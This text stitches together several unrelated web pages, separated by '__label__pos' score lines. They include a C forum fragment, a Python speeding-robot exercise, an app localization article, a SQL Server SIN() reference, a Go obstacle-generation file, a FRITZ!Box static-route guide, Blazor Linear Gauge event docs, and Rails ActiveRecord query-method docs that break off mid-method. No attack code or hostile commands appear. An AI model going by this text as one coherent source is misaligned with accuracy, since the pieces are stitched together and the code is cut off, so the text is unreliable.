action_three(); break; default: printf("Unknown code\n"); } Popular pages Recent additions subscribe to a feed Similar Threads 1. Another Novice question.. By Paradigm in forum C Programming Replies: 4 Last Post: 03-12-2011, 09:33 AM 2. Interactive vs non-interactive terminal session question By Overworked_PhD in forum Tech Board Replies: 2 Last Post: 06-18-2009, 07:30 PM 3. Replies: 10 Last Post: 06-17-2005, 10:00 PM 4. Novice question.. please help. By sivex in forum C Programming Replies: 1 Last Post: 03-15-2005, 10:26 AM 5. C or C++ the Eternal Question or Perhaps Not for a NOVICE By bobbyjrbbobbyjr in forum A Brief History of Cprogramming.com Replies: 1 Last Post: 10-23-2002, 09:23 PM 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
__label__pos
0.502435
Python's Not (Just) For Unicorns An interactive introduction to programming in Python, for human beings and whoever else Project Project - Speeding robot In Virginia, there are two punishments for speeding in a car: a speeding ticket (bad), or reckless driving (worse!). We’re going to build a robot to warn people about their driving habits. Ask the user how fast they are going, print out their speed, then print out their status according to these guidelines: • Going over 80mph? Reckless driving • Going 20mph or more over the speed limit? Reckless driving (e.g. 50 in a 30 zone) • Going over the speed limit? Speeding • Going more than 5mph under the speed limit? Too slow • Everything else? Just right Note: You cannot be charged with both reckless driving and speeding. If you’re going fast enough to be reckless, it’s just reckless driving. The code I’ve given you randomly picks a speed limit1 and prints it to the screen. After that, it’s all up to you! Start by asking the user how fast they’re going. [1] Technically the code imports some other code that lets you use random numbers, then picks a number between 15 and 65, going in steps of 5 (15, 20, 25, 30…) import random random.seed(6779) speed_limit = random.randrange(15, 66, 5) print("The speed limit is", speed_limit) • Hint: Use input to ask how fast the user is going • Hint: speed = input("How fast were you going?") will save the user’s input to a variable called speed • Hint: input always gives you a string, so you’ll need to use int() to convert the user’s input to an integer. If we don’t, you can’t compare it to other numbers! That’ll probably give you an unorderable types error about str and int. • Hint: You can convert speed to an integer every time you compare - like int(speed) > speed_limit - or you can convert just once and overwrite the original value, like speed = int(speed) • Hint: You’ll probably want to use elif when checking the speed. • Hint: Once Python finds an if or elif that works, it doesn’t run any of the other options. The order that you check in will probably be important!
__label__pos
0.780484
Behind the Screens: App Localization 101 The world of app localization can seem a complex place. For starters, there’s a hefty helping of terminology to unpack and understand; what is a string? A repo? What does it mean to cut a build? And how does the content for translation travel all the way from software developer to translator? There’s a lot to tuck into here, so consider this part one in a short series that takes you behind the screens to explore the work involved in creating an app that’s truly global. In this first instalment, we’ll get a little more familiar with the two terms that sit at the centre of it all – internationalization and localization. Internationalization vs. Localization Localization (l10n for short) is the part of creating a multilingual product that we tend to be more familiar with in our daily lives, and refers to adapting content for specific markets or languages. This can include a wide variety of activities ranging from translation, transcreation, and copywriting, to changing images, fonts, or colours to better represent each market. Depending on the scope of the localization work, individual languages or regions might have very different versions of the same product – as each version has been custom made for success in particular markets. Internationalization (i18n), on the other hand, is the tech infrastructure that allows an app to work well in any potential language or market. Examples of i18n practices include using Unicode encoding so that text in all major languages will display correctly, building responsive user interfaces that can dynamically resize for longer or shorter text, using internationalization libraries to help handle conversions of numbers, and externalizing strings from the rest of the app’s code (more on externalization another day). Good internationalization is crucial to allow tech companies to scale, because it is not sustainable to customize an app for every individual language. Let’s say, for example, that we have a successful English-language rideshare app, and now we want to expand into a few new territories. Not only do we need to translate all of the words in the app and transcreate all of the catchy headlines we use to attract users, but what happens when we need to show our users how much their rides cost, or what time their driver will arrive? Do we need to ask our linguists to tell us where to put dashes, slashes, dots, commas, or colons whenever we display a number? Our app uses one sentence to tell drivers they are picking up “a passenger” and another sentence when they’re picking up “passengers” but what about when we translate into Polish, for example, and we need different sentences depending on if there is one passenger, two passengers, or five passengers? How will our app handle all of these custom scenarios, in every language and region we want to support? It doesn’t make sense to do these customizations for every new market. Instead, if we set up our app to work with internationalization libraries that manage numbers and pluralization – computers can help us remember and implement these rules. Without internationalization to give us this framework, we would have a lot of custom work to redo every time we plan to enter a new market. Best Practices: l10n and i18n Now that we have a handle on what these terms mean, let’s take a look at some best practices that we can put into action. ●     Responsive and flexible design A translation can often be much longer than the original source text, so any design elements in an app user interface need to accommodate both long and short text automatically. Fonts and text boxes should automatically resize when text is long, and text should wrap automatically to the next line instead of allowing long words to shoot off the edge of the screen. ●     Font support Fonts need to support all characters in all languages so you don’t end up with errors in the middle of your strings – following Unicode standards helps ensure special characters won’t be corrupted. ●     One message, one string Lastly, wherever possible, strings should not be concatenated. “Concatenation” is a technical term for making one message out of multiple short strings. It can save time when writing code, but it is not considered good internationalization practice because there’s no guarantee that the phrases you have combined in the source language can be combined in the same way in all translation languages.  An example of concatenation would be:  String 1: “You have_____.” String 2: # messages String 3: # friend requests String 2 and String 3 are options that can fill in the blank in String 1. This is a problem for localization, because translators have to ensure that “You have” agrees with both string 2 and string 3, as well as anything else that could conceivably be added later on – which is not possible in many languages because the gender of a verb depends on the gender of the noun(s) in the sentence. Also, if syntax rules differ between the source and the target languages, and the linguists aren’t able to change the location in string 1 to insert string 2 or string 3, they may end up with very clunky, unnatural sentences in an attempt fit the pattern set by the source strings. With internationalization in mind, the correct way to structure this string would be to create two separate strings, each containing its own complete message: String 1: “You have # messages.” String 2: “You have # friend requests.” This way, the linguists can ensure that all parts of the sentence will have the correct grammatical agreements. Remembering “one message, one string” can solve a lot of localization headaches. Ready for more on the ins and outs of app localization? Dive into our next piece, App Localization 2.0, to untangle the importance of strings when it comes to creating a global app. Share this article: Ready to bring your brand voice to life? We’re ready to talk!
__label__pos
0.722189
SQL Tutorial SQL HOME SQL Intro SQL Syntax SQL Select SQL Select Distinct SQL Where SQL And, Or, Not SQL Order By SQL Insert Into SQL Null Values SQL Update SQL Delete SQL Select Top SQL Min and Max SQL Count, Avg, Sum SQL Like SQL Wildcards SQL In SQL Between SQL Aliases SQL Joins SQL Inner Join SQL Left Join SQL Right Join SQL Full Join SQL Self Join SQL Union SQL Group By SQL Having SQL Exists SQL Any, All SQL Select Into SQL Insert Into Select SQL Case SQL Null Functions SQL Stored Procedures SQL Comments SQL Database SQL Create DB SQL Drop DB SQL Backup DB SQL Create Table SQL Drop Table SQL Alter Table SQL Constraints SQL Not Null SQL Unique SQL Primary Key SQL Foreign Key SQL Check SQL Default SQL Index SQL Auto Increment SQL Dates SQL Views SQL Injection SQL Hosting SQL References SQL Keywords MySQL Functions SQL Server Functions MS Access Functions SQL Operators SQL Data Types SQL Quick Ref SQL Examples SQL Examples SQL Exercises SQL Server SIN() Function ❮ SQL Server Functions Example Return the sine of a number: SELECT SIN(2); Try it Yourself » Definition and Usage The SIN() function returns the sine of a number. Syntax SIN(number) Parameter Values Parameter Description number Required. A numeric value Technical Details Works in: SQL Server (starting with 2008), Azure SQL Database, Azure SQL Data Warehouse, Parallel Data Warehouse More Examples Example Return the sine of a number: SELECT SIN(-1); Try it Yourself » ❮ SQL Server Functions
__label__pos
0.560189
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.           89 lines 2.2 KiB package server import ( "encoding/json" "math" "math/rand" v "hackerbots.us/vector" ) // Obstacle is the implementation of the generic building type in the game. type Obstacle struct { Bounds v.AABB2d `json:"bounds"` Hp int `json:"-"` } func (o *Obstacle) MarshalJSON() ([]byte, error) { payload := [4]float64{ o.Bounds.A.X, o.Bounds.A.Y, o.Bounds.B.X, o.Bounds.B.Y, } return json.Marshal(payload) } func (o *Obstacle) UnmarshalJSON(incoming []byte) error { payload := [4]float64{} err := json.Unmarshal(incoming, &payload) if err != nil { return err } o.Bounds = v.AABB2d{ A: v.Point2d{X: payload[0], Y: payload[1]}, B: v.Point2d{X: payload[2], Y: payload[3]}, } return nil } func (o Obstacle) distance_from_point(p v.Point2d) float64 { dist := math.MaxFloat32 dist = math.Min(dist, float64(p.Sub(o.Bounds.A).Mag())) dist = math.Min(dist, float64(p.Sub(o.Bounds.B).Mag())) dist = math.Min(dist, float64(p.Sub(v.Point2d{X: o.Bounds.A.X, Y: o.Bounds.B.Y}).Mag())) dist = math.Min(dist, float64(p.Sub(v.Point2d{X: o.Bounds.B.X, Y: o.Bounds.A.Y}).Mag())) return dist } func obstacleFromValues(x, y, w, h float64, hp int) (o Obstacle) { return Obstacle{ Bounds: v.AABB2d{ A: v.Point2d{X: x, Y: y}, B: v.Point2d{X: x + w, Y: y + h}, }, Hp: hp, } } // GenerateObstacles returns a slice of (count) obstacles within a region // bounded by width, height. func GenerateObstacles(count int, width, height float64) []Obstacle { out := []Obstacle{} // Create obstacles that cover the edges of the world, so we don't need to // special case collision at the edges // left wall out = append(out, obstacleFromValues(0, 5, 5, height-10, 0)) // // right wall out = append(out, obstacleFromValues(width-5, 5, 5, height-10, 0)) // // top wall out = append(out, obstacleFromValues(0, height-5, width, 5, 0)) // bottom wall out = append(out, obstacleFromValues(0, 0, width, 5, 0)) // Now create N random objects somewhere in the world for i := 0; i < count; i++ { x := rand.Float64() * (width - (width / 10)) y := rand.Float64() * (height - (height / 10)) w := rand.Float64()*(width/10) + 20 h := rand.Float64()*(height/10) + 20 out = append( out, obstacleFromValues(x, y, w, h, 10000)) } return out }
__label__pos
0.999529
FRITZ!Box 7490 Serwis - Baza wiedzy FRITZ!Box 7490 Serwis Not your product? Configuring a static IP route in the FRITZ!Box Each connected network device (for example a computer) requires an IP address from the FRITZ!Box's IP network (192.168.178.0/24 in the factory settings) in order for it to access the Internet via the FRITZ!Box. In a network with multiple IP networks (subnets), you must configure static routes in the FRITZ!Box in order to enable all network devices to access the Internet via the FRITZ!Box. Example values used in this guide In this example we show you how to configure Internet access for network devices in their own IPv4 network that are connected to the FRITZ!Box's IPv4 network by means of a router. When you set up the devices, replace the values used in this example with actual values. • IPv4 network of FRITZ!Box: 192.168.20.0 (subnet mask: 24 - 255.255.255.0) • IPv4 network of the router connected to the FRITZ!Box: 192.168.21.0 (subnet mask: 24 - 255.255.255.0) • IPv4 addresses of the router in the FRITZ!Box network: 192.168.20.2 and 192.168.21.1 Important:Some of the settings described here are only displayed if the advanced view is enabled in the user interface. The configuration procedure and notes on functions given in this guide refer to the latest FRITZ!OS. 1 Configuring a static IP route in the FRITZ!Box 1. Click "Home Network" in the FRITZ!Box user interface. 2. Click "Home Network Overview" in the "Home Network" menu. 3. Click on the "Network Settings" tab. 4. If you want to configure an IPv4 route: 1. Click "IPv4 Routes". 2. Click the "New IPv4 Route" button. 3. Enter the IPv4 network of the router connected to the FRITZ!Box (192.168.21.0) as the "IPv4 network". 4. Enter the subnet mask of the other IPv4 network (255.255.255.0) in the "Subnet mask" field. 5. For "Gateway", enter the IPv4 address of the router in the FRITZ!Box home network (192.168.20.2) that connects the two IP networks. 6. Enable the option "IPv4 route active". 5. If you want to configure an IPv6 route: Important:DNSv6 serves can only be configured if IPv6 support is enabled in the FRITZ!Box under "Internet > Account Information > IPv6". 1. Click "IPv6 Routes". 2. Click the "New IPv6 Route" button. 3. Enter the IPv6 network of the router connected to the FRITZ!Box as the "IPv6 network". 4. Enter the IPv6 prefix of the other IPv6 network as the "Prefix length". 5. For "Gateway", enter the link-local address of the router in the FRITZ!Box home network that connects the two IPv6 networks. 6. Enable the option "IPv6 route active". 6. Click "OK" to save the settings. 2 Configuring the IP route in the network router • Configure the network router according to the manufacturer's instructions so that it routes between the FRITZ!Box's IP network (192.168.20.0) and its own IP network (192.168.21.0). Note:If you are using a windows computer with several network adapters as the network router, you must enable "IP routing" in Windows. Microsoft can provide you with information on configuring IP routing. 3 Configuring network devices in the network router's IP network • On the network devices, configure the IP address of the network router from its own IP network (192.168.21.1) as the standard gateway, • or: • On the network devices, configure a static IP route to the IP network of the FRITZ!Box (192.168.20.0) that uses the network router as the gateway (192.168.21.1). Now the network devices of the second IP network can access the FRITZ!Box's Internet connection.
__label__pos
0.758011
Events in Blazor Linear Gauge Component 30 Aug 20218 minutes to read This section describes the Linear Gauge component’s event that gets triggered when corresponding operations are performed. The events should be provided to the Linear Gauge by using the LinearGaugeEvents. AnnotationRendering Before the annotation is rendered in the Linear Gauge, the AnnotationRendering event will be triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents AnnotationRendering="AnnotationRender"></LinearGaugeEvents> <LinearGaugeAnnotations> <LinearGaugeAnnotation AxisValue="0" ZIndex="1" Content="40"> </LinearGaugeAnnotation> </LinearGaugeAnnotations> <LinearGaugeAxes> <LinearGaugeAxis> <LinearGaugePointers> <LinearGaugePointer Value="40"></LinearGaugePointer> </LinearGaugePointers> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void AnnotationRender(AnnotationRenderEventArgs args) { // Code here } } AxisLabelRendering Before each axis label is rendered in the Linear Gauge, the AxisLabelRendering event is fired. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents AxisLabelRendering="LabelRender"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void LabelRender(AxisLabelRenderEventArgs args) { // Code here } } Loaded After the Linear Gauge has been loaded, the Loaded event will be triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents Loaded="Loaded"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void Loaded(LoadedEventArgs args) { // Code here } } OnDragEnd The OnDragEnd event will be fired before the pointer drag is completed. To know more about the argument of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnDragStart="DragEnd"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> <LinearGaugePointers> <LinearGaugePointer Value="40" EnableDrag="true"></LinearGaugePointer> </LinearGaugePointers> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void DragEnd(PointerDragEventArgs args) { // Code here } } OnDragStart When the pointer drag begins, the OnDragStart event is triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnDragStart="DragStart"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> <LinearGaugePointers> <LinearGaugePointer Value="40" EnableDrag="true"></LinearGaugePointer> </LinearGaugePointers> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void DragStart(PointerDragEventArgs args) { // Code here } } OnGaugeMouseDown When mouse is pressed down on the gauge, the OnGaugeMouseDown event is triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnGaugeMouseDown="MouseDown"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void MouseDown(Syncfusion.Blazor.LinearGauge.MouseEventArgs args) { //Code here } } OnGaugeMouseLeave When mouse pointer leaves the gauge, the OnGaugeMouseLeave event is triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnGaugeMouseLeave="MouseLeave"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void MouseLeave(Syncfusion.Blazor.LinearGauge.MouseEventArgs args) { //Code here } } OnGaugeMouseUp When the mouse pointer is released over the Linear Gauge, the OnGaugeMouseUp event is triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnGaugeMouseUp="MouseUp"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void MouseUp(Syncfusion.Blazor.LinearGauge.MouseEventArgs args) { //Code here } } OnLoad Before the Linear Gauge is loaded, the OnLoad event is fired. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge> <LinearGaugeEvents OnLoad="Load"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void Load(LoadEventArgs args) { // Code here } } OnPrint The OnPrint event is fired before the print begins. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <button @onclick="PrintGauge">Print</button> <SfLinearGauge @ref="gauge" AllowPrint="true"> <LinearGaugeEvents OnPrint="Print"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis Minimum="0" Maximum="100"> <LinearGaugeMajorTicks Interval="20"></LinearGaugeMajorTicks> <LinearGaugeMinorTicks Interval="10"></LinearGaugeMinorTicks> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { SfLinearGauge gauge; public void PrintGauge() { this.gauge.Print(); } public void Print(PrintEventArgs args) { // Code here } } Resizing Prior to the window resizing, the Resizing event is triggered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge Width="100%"> <LinearGaugeEvents Resizing="Resize"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void Resize(ResizeEventArgs args) { // Code here } } TooltipRendering The TooltipRendering event is fired before the tooltip is rendered. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <SfLinearGauge Width="100%"> <LinearGaugeEvents TooltipRendering="TooltipRender"></LinearGaugeEvents> <LinearGaugeTooltipSettings Enable="true"></LinearGaugeTooltipSettings> <LinearGaugeAxes> <LinearGaugeAxis> <LinearGaugePointers> <LinearGaugePointer Value="50"></LinearGaugePointer> </LinearGaugePointers> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> @code { public void TooltipRender(TooltipRenderEventArgs args) { // Code here } } ValueChange The ValueChange event is triggered when the pointer is dragged from one value to another. To know more about the arguments of this event, refer here. @using Syncfusion.Blazor.LinearGauge <div style="width:250px"> <SfLinearGauge Height="250px"> <LinearGaugeEvents ValueChange="@UpdatePointerValue"></LinearGaugeEvents> <LinearGaugeAxes> <LinearGaugeAxis> <LinearGaugePointers> <LinearGaugePointer EnableDrag="true" PointerValue="10"> </LinearGaugePointer> </LinearGaugePointers> </LinearGaugeAxis> </LinearGaugeAxes> </SfLinearGauge> </div> @code { private double pointerValue = 10; public void UpdatePointerValue(ValueChangeEventArgs args) { pointerValue = args.Value; } } Bind event to linear gauge
__label__pos
0.753823
Module: ActiveRecord::QueryMethods Extended by: ActiveSupport::Concern Includes: ActiveModel::ForbiddenAttributesProtection Included in: Relation Defined in: activerecord/lib/active_record/relation/query_methods.rb Defined Under Namespace Classes: WhereChain Constant Summary collapse FROZEN_EMPTY_ARRAY = [].freeze FROZEN_EMPTY_HASH = {}.freeze VALID_UNSCOPING_VALUES = Set.new([:where, :select, :group, :order, :lock, :limit, :offset, :joins, :left_outer_joins, :annotate, :includes, :from, :readonly, :having, :optimizer_hints]) Instance Method Summary collapse Methods included from ActiveSupport::Concern append_features, class_methods, extended, included Instance Method Details #_select!(*fields) ⇒ Object :nodoc: 281 282 283 284 285 286 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 281 def _select!(*fields) # :nodoc: fields.compact_blank! fields.flatten! self.select_values += fields self end #annotate(*args) ⇒ Object Adds an SQL comment to queries generated from this relation. For example: User.annotate("selecting user names").select(:name) # SELECT "users"."name" FROM "users" /* selecting user names */ User.annotate("selecting", "user", "names").select(:name) # SELECT "users"."name" FROM "users" /* selecting */ /* user */ /* names */ The SQL block comment delimiters, “/*” and “*/”, will be added automatically. 1006 1007 1008 1009 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1006 def annotate(*args) check_if_method_has_arguments!(:annotate, args) spawn.annotate!(*args) end #annotate!(*args) ⇒ Object Like #annotate, but modifies relation in place. 1012 1013 1014 1015 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1012 def annotate!(*args) # :nodoc: self.annotate_values += args self end #arel(aliases = nil) ⇒ Object Returns the Arel object associated with the relation. 1018 1019 1020 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1018 def arel(aliases = nil) # :nodoc: @arel ||= build_arel(aliases) end #construct_join_dependency(associations, join_type) ⇒ Object :nodoc: 1022 1023 1024 1025 1026 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 1022 def construct_join_dependency(associations, join_type) # :nodoc: ActiveRecord::Associations::JoinDependency.new( klass, table, associations, join_type ) end #create_with(value) ⇒ Object Sets attributes to be used when creating new records from a relation object. users = User.where(name: 'Oscar') users.new.name # => 'Oscar' users = users.create_with(name: 'DHH') users.new.name # => 'DHH' You can pass nil to #create_with to reset attributes: users = users.create_with(nil) users.new.name # => 'Oscar' 839 840 841 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 839 def create_with(value) spawn.create_with!(value) end #create_with!(value) ⇒ Object :nodoc: 843 844 845 846 847 848 849 850 851 852 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 843 def create_with!(value) # :nodoc: if value value = sanitize_forbidden_attributes(value) self.create_with_value = create_with_value.merge(value) else self.create_with_value = FROZEN_EMPTY_HASH end self end #distinct(value = true) ⇒ Object Specifies whether the records should be unique or not. For example: User.select(:name) # Might return two records with the same name User.select(:name).distinct # Returns 1 record per distinct name User.select(:name).distinct.distinct(false) # You can also remove the uniqueness 886 887 888 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 886 def distinct(value = true) spawn.distinct!(value) end #distinct!(value = true) ⇒ Object Like #distinct, but modifies relation in place. 891 892 893 894 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 891 def distinct!(value = true) # :nodoc: self.distinct_value = value self end #eager_load(*args) ⇒ Object Forces eager loading by performing a LEFT OUTER JOIN on args: User.eager_load(:posts) # SELECT "users"."id" AS t0_r0, "users"."name" AS t0_r1, ... # FROM "users" LEFT OUTER JOIN "posts" ON "posts"."user_id" = # "users"."id" 168 169 170 171 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 168 def eager_load(*args) check_if_method_has_arguments!(:eager_load, args) spawn.eager_load!(*args) end #eager_load!(*args) ⇒ Object :nodoc: 173 174 175 176 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 173 def eager_load!(*args) # :nodoc: self.eager_load_values += args self end #extending(*modules, &block) ⇒ Object Used to extend a scope with additional methods, either through a module or through a block provided. The object returned is a relation, which can be further extended. Using a module module Pagination def page(number) # pagination code goes here end end scope = Model.all.extending(Pagination) scope.page(params[:page]) You can also pass a list of modules: scope = Model.all.extending(Pagination, SomethingElse) Using a block scope = Model.all.extending do def page(number) # pagination code goes here end end scope.page(params[:page]) You can also use a block and a module list: scope = Model.all.extending(Pagination) do def per_page(number) # pagination code goes here end end 932 933 934 935 936 937 938 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 932 def extending(*modules, &block) if modules.any? || block spawn.extending!(*modules, &block) else self end end #extending!(*modules, &block) ⇒ Object :nodoc: 940 941 942 943 944 945 946 947 948 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 940 def extending!(*modules, &block) # :nodoc: modules << Module.new(&block) if block modules.flatten! self.extending_values += modules extend(*extending_values) if extending_values.any? self end #extract_associated(association) ⇒ Object Extracts a named association from the relation. The named association is first preloaded, then the individual association records are collected from the relation. Like so: .memberships.extract_associated(:user) # => Returns collection of User records This is short-hand for: .memberships.preload(:user).collect(&:user) 201 202 203 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 201 def extract_associated(association) preload(association).collect(&association) end #from(value, subquery_name = nil) ⇒ Object Specifies table from which the records will be fetched. For example: Topic.select('title').from('posts') # SELECT title FROM posts Can accept other relation objects. For example: Topic.select('title').from(Topic.approved) # SELECT title FROM (SELECT * FROM topics WHERE approved = 't') subquery Topic.select('a.title').from(Topic.approved, :a) # SELECT a.title FROM (SELECT * FROM topics WHERE approved = 't') a 867 868 869 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 867 def from(value, subquery_name = nil) spawn.from!(value, subquery_name) end #from!(value, subquery_name = nil) ⇒ Object :nodoc: 871 872 873 874 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 871 def from!(value, subquery_name = nil) # :nodoc: self.from_clause = Relation::FromClause.new(value, subquery_name) self end #group(*args) ⇒ Object Allows to specify a group attribute: User.group(:name) # SELECT "users".* FROM "users" GROUP BY name Returns an array with distinct records based on the group attribute: User.select([:id, :name]) # => [#<User id: 1, name: "Oscar">, #<User id: 2, name: "Oscar">, #<User id: 3, name: "Foo">] User.group(:name) # => [#<User id: 3, name: "Foo", ...>, #<User id: 2, name: "Oscar", ...>] User.group('name AS grouped_name, age') # => [#<User id: 3, name: "Foo", age: 21, ...>, #<User id: 2, name: "Oscar", age: 21, ...>, #<User id: 5, name: "Foo", age: 23, ...>] Passing in an array of attributes to group by is also supported. User.select([:id, :first_name]).group(:id, :first_name).first(3) # => [#<User id: 1, first_name: "Bill">, #<User id: 2, first_name: "Earl">, #<User id: 3, first_name: "Beto">] 329 330 331 332 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 329 def group(*args) check_if_method_has_arguments!(:group, args) spawn.group!(*args) end #group!(*args) ⇒ Object :nodoc: 334 335 336 337 338 339 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 334 def group!(*args) # :nodoc: args.flatten! self.group_values += args self end #having(opts, *rest) ⇒ Object Allows to specify a HAVING clause. Note that you can’t use HAVING without also specifying a GROUP clause. Order.having('SUM(price) > 30').group('user_id') 716 717 718 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 716 def having(opts, *rest) opts.blank? ? self : spawn.having!(opts, *rest) end #having!(opts, *rest) ⇒ Object :nodoc: 720 721 722 723 724 725 726 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 720 def having!(opts, *rest) # :nodoc: opts = sanitize_forbidden_attributes(opts) references!(PredicateBuilder.references(opts)) if Hash === opts self.having_clause += having_clause_factory.build(opts, rest) self end #includes(*args) ⇒ Object Specify relationships to be included in the result set. For example: users = User.includes(:address) users.each do |user| user.address.city end allows you to access the address attribute of the User model without firing an additional query. This will often result in a performance improvement over a simple join. You can also specify multiple relationships, like this: users = User.includes(:address, :friends) Loading nested relationships is possible using a Hash: users = User.includes(:address, friends: [:address, :followers]) conditions If you want to add string conditions to your included models, you’ll have to explicitly reference them. For example: User.includes(:posts).where('posts.name = ?', 'example') Will throw an error, but this will work: User.includes(:posts).where('posts.name = ?', 'example').references(:posts) Note that #includes works with association names while #references needs the actual table name. If you pass the conditions via hash, you don’t need to call #references explicitly, as #where references the tables for you. For example, this will work correctly: User.includes(:posts).where(posts: { name: 'example' }) 149 150 151 152 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 149 def includes(*args) check_if_method_has_arguments!(:includes, args) spawn.includes!(*args) end #includes!(*args) ⇒ Object :nodoc: 154 155 156 157 158 159 160 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 154 def includes!(*args) # :nodoc: args.compact_blank! args.flatten! self.includes_values |= args self end #joins(*args) ⇒ Object Performs a joins on args. The given symbol(s) should match the name of the association(s). User.joins(:posts) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" Multiple joins: User.joins(:posts, :account) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" # INNER JOIN "accounts" ON "accounts"."id" = "users"."account_id" Nested joins: User.joins(posts: [:comments]) # SELECT "users".* # FROM "users" # INNER JOIN "posts" ON "posts"."user_id" = "users"."id" # INNER JOIN "comments" "comments_posts" # ON "comments_posts"."post_id" = "posts"."id" You can use strings in order to customize your joins: User.joins("LEFT JOIN bookmarks ON bookmarks.bookmarkable_type = 'Post' AND bookmarks.user_id = users.id") # SELECT "users".* FROM "users" LEFT JOIN bookmarks ON bookmarks.bookmarkable_type = 'Post' AND bookmarks.user_id = users.id 497 498 499 500 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 497 def joins(*args) check_if_method_has_arguments!(:joins, args) spawn.joins!(*args) end #joins!(*args) ⇒ Object :nodoc: 502 503 504 505 506 507 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 502 def joins!(*args) # :nodoc: args.compact! args.flatten! self.joins_values += args self end #left_outer_joins(*args) ⇒ Object Also known as: left_joins Performs a left outer joins on args: User.left_outer_joins(:posts) => SELECT "users".* FROM "users" LEFT OUTER JOIN "posts" ON "posts"."user_id" = "users"."id" 514 515 516 517 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 514 def left_outer_joins(*args) check_if_method_has_arguments!(__callee__, args) spawn.left_outer_joins!(*args) end #left_outer_joins!(*args) ⇒ Object :nodoc: 520 521 522 523 524 525 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 520 def left_outer_joins!(*args) # :nodoc: args.compact! args.flatten! self.left_outer_joins_values += args self end #limit(value) ⇒ Object Specifies a limit for the number of records to retrieve. User.limit(10) # generated SQL has 'LIMIT 10' User.limit(10).limit(20) # generated SQL has 'LIMIT 20' 733 734 735 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 733 def limit(value) spawn.limit!(value) end #limit!(value) ⇒ Object :nodoc: 737 738 739 740 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 737 def limit!(value) # :nodoc: self.limit_value = value self end #lock(locks = true) ⇒ Object Specifies locking settings (default to true). For more information on locking, please see ActiveRecord::Locking. 760 761 762 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 760 def lock(locks = true) spawn.lock!(locks) end #lock!(locks = true) ⇒ Object :nodoc: 764 765 766 767 768 769 770 771 772 773 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 764 def lock!(locks = true) # 